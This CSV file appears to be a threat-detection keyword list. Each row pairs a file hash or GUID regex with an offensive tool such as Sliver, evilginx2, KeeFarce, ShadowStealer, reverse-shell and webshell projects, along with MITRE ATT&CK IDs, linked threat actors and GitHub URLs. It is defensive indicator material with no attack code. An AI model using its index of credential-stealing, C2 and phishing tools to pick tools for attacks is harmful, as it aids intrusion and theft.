"*438f9082ae1cd3bc27027e8d1a14adcc96768fe52dea5594e31487d01f0dd250*",".{0,1000}438f9082ae1cd3bc27027e8d1a14adcc96768fe52dea5594e31487d01f0dd250.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25584"
"*43A031B0-E040-4D5E-B477-02651F5E3D62*",".{0,1000}43A031B0\-E040\-4D5E\-B477\-02651F5E3D62.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","#GUIDproject","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","25586"
"*43a56d6c2de9c58277b8b10b2ad348d2b18b7d440ebf12b3c3c7099fcd06d9e7*",".{0,1000}43a56d6c2de9c58277b8b10b2ad348d2b18b7d440ebf12b3c3c7099fcd06d9e7.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25587"
"*43a7a1b32cc0536407af440786bb716c90f309647e1da3eda3d21fbd08b2338f*",".{0,1000}43a7a1b32cc0536407af440786bb716c90f309647e1da3eda3d21fbd08b2338f.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#filehash","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","25588"
"*43ac133ca47ed9916e78d39f8a3bd05bc8ef31f3925ccaa4b24e769f47e2f61f*",".{0,1000}43ac133ca47ed9916e78d39f8a3bd05bc8ef31f3925ccaa4b24e769f47e2f61f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25590"
"*43b5fbace7d714684822e05f4ceb05e77ca3dc638861003086a5ea96bd7b0257*",".{0,1000}43b5fbace7d714684822e05f4ceb05e77ca3dc638861003086a5ea96bd7b0257.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25592"
"*43BB3C30-39D7-4B6B-972E-1E2B94D4D53A*",".{0,1000}43BB3C30\-39D7\-4B6B\-972E\-1E2B94D4D53A.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","#GUIDproject","N/A","8","2","118","14","2025-02-21T12:33:43Z","2023-08-25T15:18:30Z","25594"
"*43bc3fe471a81b11c2e59cd0fd55630cee7860f8caad44fb8ee54d109e01a5e5*",".{0,1000}43bc3fe471a81b11c2e59cd0fd55630cee7860f8caad44fb8ee54d109e01a5e5.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","25595"
"*43c1a32158fa01f876c670e53c90f43ebdf4cf61f7b8cc683f06c0c76250bb1a*",".{0,1000}43c1a32158fa01f876c670e53c90f43ebdf4cf61f7b8cc683f06c0c76250bb1a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25596"
"*43c40eb82cecff19379a8de93b36686149eded614d1dfbdabd31e3fb9e6f3fc6*",".{0,1000}43c40eb82cecff19379a8de93b36686149eded614d1dfbdabd31e3fb9e6f3fc6.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","#filehash","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","25597"
"*43cead8f26b98fad21e2e16e0d98da92e49606b347616c1a5eec5c0bcc492056*",".{0,1000}43cead8f26b98fad21e2e16e0d98da92e49606b347616c1a5eec5c0bcc492056.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","25600"
"*43d446b0423388d156a4d8c61a65ab5e1492b045fbfcd528689d525af758678d*",".{0,1000}43d446b0423388d156a4d8c61a65ab5e1492b045fbfcd528689d525af758678d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25603"
"*43d7e47e21d334bb7130c5709c16f02e2cf7e4a808382aed3c0ba12cc84b9ea9*",".{0,1000}43d7e47e21d334bb7130c5709c16f02e2cf7e4a808382aed3c0ba12cc84b9ea9.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","0","#filehash","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","25604"
"*43da5889dce96d8f11dd09ab509217c13aad4a9cc51538633428aa9887b1039d*",".{0,1000}43da5889dce96d8f11dd09ab509217c13aad4a9cc51538633428aa9887b1039d.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","25605"
"*43df5040293c26759058a425487affe0f84cdbe1cee85567788f7099782d77df*",".{0,1000}43df5040293c26759058a425487affe0f84cdbe1cee85567788f7099782d77df.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25606"
"*43ebdb62e179113a55ccd4297316532582be71857b85d85ba187cd6146757397*",".{0,1000}43ebdb62e179113a55ccd4297316532582be71857b85d85ba187cd6146757397.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","25609"
"*43f5ef8c625efba630bb99fd4ae086008ebed5c2f3386f1b43bbe8ee7c06f591*",".{0,1000}43f5ef8c625efba630bb99fd4ae086008ebed5c2f3386f1b43bbe8ee7c06f591.{0,1000}","offensive_tool_keyword","Aoyama ","Python Botnet ","T1059 - T1219 - T1090 - T1102 - T1213 - T1095 - T1071 - T1486 - T1083 - T1041 - T1012 - T1027","TA0011 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/Leeon123/Aoyama","1","0","#filehash","N/A","10","10","260","63","2022-03-23T09:49:43Z","2019-07-16T13:04:07Z","25611"
"*43f6bfcdb8751cd4232241d4baf2c46333c7a71885fd9571242e16c4b4a81691*",".{0,1000}43f6bfcdb8751cd4232241d4baf2c46333c7a71885fd9571242e16c4b4a81691.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","25612"
"*43fab469f6f43d0434dd4cfb16d6719c353618d818ebd2ead0f8a0f23f84e4c3*",".{0,1000}43fab469f6f43d0434dd4cfb16d6719c353618d818ebd2ead0f8a0f23f84e4c3.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","25613"
"*440fb40172430f771a7c289ebb8257988624fdd0a95f84d0b24432a18144b4be*",".{0,1000}440fb40172430f771a7c289ebb8257988624fdd0a95f84d0b24432a18144b4be.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25616"
"*441ad151017dbc879fa10de0f4b090d296ec028cbdd5587bb72a62e521c21157*",".{0,1000}441ad151017dbc879fa10de0f4b090d296ec028cbdd5587bb72a62e521c21157.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25618"
"*441c29048f8aee256eee59a66098ff2223b1f225386aa9d91b8d391ea0f59cb2*",".{0,1000}441c29048f8aee256eee59a66098ff2223b1f225386aa9d91b8d391ea0f59cb2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25619"
"*441cb40ecc946bfb7d9ec0e7880f17f07b899adb176c6f40231aec2ab41ac1d7*",".{0,1000}441cb40ecc946bfb7d9ec0e7880f17f07b899adb176c6f40231aec2ab41ac1d7.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","#filehash","N/A","10","","N/A","","","","25620"
"*4420ccad05518f31e8960f7af1dd0d50e34331ff19fc618511cf91ac557e2f3f*",".{0,1000}4420ccad05518f31e8960f7af1dd0d50e34331ff19fc618511cf91ac557e2f3f.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","25621"
"*4427e67765107bd7436624619a93336d4ddf0bc22a0ae1a2c8dca47a04d4d2c3*",".{0,1000}4427e67765107bd7436624619a93336d4ddf0bc22a0ae1a2c8dca47a04d4d2c3.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25622"
"*44321a4dc67e158e93fd037ef197dddfc4e454cacfd87f13964032edcb4b3478*",".{0,1000}44321a4dc67e158e93fd037ef197dddfc4e454cacfd87f13964032edcb4b3478.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25625"
"*4435f3c1a52fe762834684da28c45e9b5217b9c0cb65882f95cc45516c8afd9b*",".{0,1000}4435f3c1a52fe762834684da28c45e9b5217b9c0cb65882f95cc45516c8afd9b.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","4","8","N/A","N/A","N/A","N/A","25626"
"*44370c394c70f88cd9ecfb23f9d6570e2134761d1a04deea5205cec31469cfb0*",".{0,1000}44370c394c70f88cd9ecfb23f9d6570e2134761d1a04deea5205cec31469cfb0.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","25627"
"*44397fe87b7547b84e1fe0168d4cdd8128f069c5ee863accb2c4867acfcacc1a*",".{0,1000}44397fe87b7547b84e1fe0168d4cdd8128f069c5ee863accb2c4867acfcacc1a.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25628"
"*443b045acebb863062cf5b292afd9d831700510daec69f1961aa7236d1d595aa*",".{0,1000}443b045acebb863062cf5b292afd9d831700510daec69f1961aa7236d1d595aa.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","25629"
"*443D8CBF-899C-4C22-B4F6-B7AC202D4E37*",".{0,1000}443D8CBF\-899C\-4C22\-B4F6\-B7AC202D4E37.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","0","#GUIDproject","N/A","9","5","480","96","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z","25630"
"*444bb9e867be655f6c5c89b8f6f1d991417f13eeb2e1838bb42c0ac9ee5f00f7*",".{0,1000}444bb9e867be655f6c5c89b8f6f1d991417f13eeb2e1838bb42c0ac9ee5f00f7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25632"
"*4459ea3ad77b52ee723e8e8db6cf46ac565fefef5126717f7fc64d596cd4eb67*",".{0,1000}4459ea3ad77b52ee723e8e8db6cf46ac565fefef5126717f7fc64d596cd4eb67.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","#filehash","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","25634"
"*4465f8d00184474f6f609f3e2f9ad68b70bfcddbc2e8f370f8d4fa6e47a9e0ee*",".{0,1000}4465f8d00184474f6f609f3e2f9ad68b70bfcddbc2e8f370f8d4fa6e47a9e0ee.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","25635"
"*446a1979c24a8cb2efdd285f14545b1354cd7c06e9d4e69e10a5053158dee119*",".{0,1000}446a1979c24a8cb2efdd285f14545b1354cd7c06e9d4e69e10a5053158dee119.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","25637"
"*446bfa3d1953383cc10abbd6e49cc3c27eeb76abca0839c970b539f69ad26c1a*",".{0,1000}446bfa3d1953383cc10abbd6e49cc3c27eeb76abca0839c970b539f69ad26c1a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25638"
"*446c06c2d90d1afb23e58a0185087888a5225a6d16aa3949648a80c47e2430ce*",".{0,1000}446c06c2d90d1afb23e58a0185087888a5225a6d16aa3949648a80c47e2430ce.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","25639"
"*446dded3a070a586ff2c25e9a17784ed650e594e9a08b703c4cbd2662b95c94c*",".{0,1000}446dded3a070a586ff2c25e9a17784ed650e594e9a08b703c4cbd2662b95c94c.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TryA9ain/BypassAddUser","1","0","#filehash","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","25640"
"*447286de6b80a554a59b971a84aed07594bb2bfb66e0760363a6b36b930c35ce*",".{0,1000}447286de6b80a554a59b971a84aed07594bb2bfb66e0760363a6b36b930c35ce.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25641"
"*4477af81ed3e1c76c637314311b3923f8155896ea2e18d5ab2fa6508f46d3b4a*",".{0,1000}4477af81ed3e1c76c637314311b3923f8155896ea2e18d5ab2fa6508f46d3b4a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25642"
"*4477d20c4924cc63a0ed4a37c18dbf9e19b96f88b606d03969d4f0adca36e847*",".{0,1000}4477d20c4924cc63a0ed4a37c18dbf9e19b96f88b606d03969d4f0adca36e847.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","25643"
"*44782077d86a1fd173b94e020c23dc511a58fe77e055116014c30f8ecc4ead91*",".{0,1000}44782077d86a1fd173b94e020c23dc511a58fe77e055116014c30f8ecc4ead91.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","#filehash","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","25644"
"*447b74994f6fec7bf3118b9c2056feca43667b899889c2a4f561303a18c82ce9*",".{0,1000}447b74994f6fec7bf3118b9c2056feca43667b899889c2a4f561303a18c82ce9.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","#filehash","N/A","10","","N/A","","","","25646"
"*447ea37d555fb32ea2957369ea1aeee31898a4e1f1783eb834dc9df2f469252e*",".{0,1000}447ea37d555fb32ea2957369ea1aeee31898a4e1f1783eb834dc9df2f469252e.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","25648"
"*4486f1bdaf83de269c93c88c139550a8c089eb82b66664ea4857ae00a5493253*",".{0,1000}4486f1bdaf83de269c93c88c139550a8c089eb82b66664ea4857ae00a5493253.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","25650"
"*448a280cf39fcebb006e9a66c81b9d59e884f0ed16590ac19d976e44fab7907d*",".{0,1000}448a280cf39fcebb006e9a66c81b9d59e884f0ed16590ac19d976e44fab7907d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25651"
